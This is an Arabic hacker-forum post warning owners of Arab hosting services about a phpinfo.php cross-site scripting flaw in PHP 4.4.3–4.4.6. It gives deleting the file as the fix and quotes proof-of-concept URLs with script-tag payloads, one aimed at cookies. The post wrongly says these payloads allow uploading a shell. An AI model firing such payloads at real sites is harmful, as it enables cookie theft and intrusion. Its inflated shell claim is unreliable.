الويب العربي - ثغرة خطيرة في نسخة php تسمح برفع شيل حصريا لدى منتديات الهكرز

بسم الله الرحمن الرحيم

####################################
جميع الحقوق محفوظة لمنتدى الهكرز
$###################################

يا اصحاب الأستضافات العربية ثغرة خطيرررة جداا في اصدارة ال php الثغرة موجوده في ملف phpinfo ومن خلال هذا الملف الموجوود نقدر نستغل الملف وفتح شيل من خلال هذا الملف

الحل هو حذف الملف هذا من السيرفر يجب التأكد من عدم وجود الملف في السيرفر او الموقع www.xxx.com/phpinfo.php تضع موقعك بدل xxx

www.xxx.com/phpinfo.php حذف ملف phpinfo.php الثغرة تم تطويرها من قبل هكرز محترفين :crazy: الحل مثل ما قلت حذف الملف ووجوده كعدمه
الأصدارة المصابة php 4 وايضا : PHP 4.4.3 - 4.4.6

المصدر مع الأستغلال حصريا مع منتديات الهكرز :

كود PHP:


		
			
To manually test for this vulnerability just call the phpinfo() page with a par***ter like this. 



http://localhost/phpinfo.php?a[]=<script>alert(/XSS/);</script> 



# milw0rm.com [2007-03-04]

ويمكنك ايضا تطبيق الثغرة بهذا الاكواد وهذه الأاكود تسمح برفع شيل :

كود PHP:


		
			
http://site.com/phpinfo.php?cx[][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][]=[XSS] 





http://site.com/phpinfo.php?cx[][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][]=<script>alert(document.************************);</script> 



http://site.com/phpinfo.php?a[]=<script>alert(/Hi hacker5/);</script>

تحياتي للجميع

ياليت الكل يقفلها لتفادي أختراق المواقع العربية والسيرفرات و

الموضوع الأصلي

http://www.hacker5.net/vb/showthread...sted=1#post 546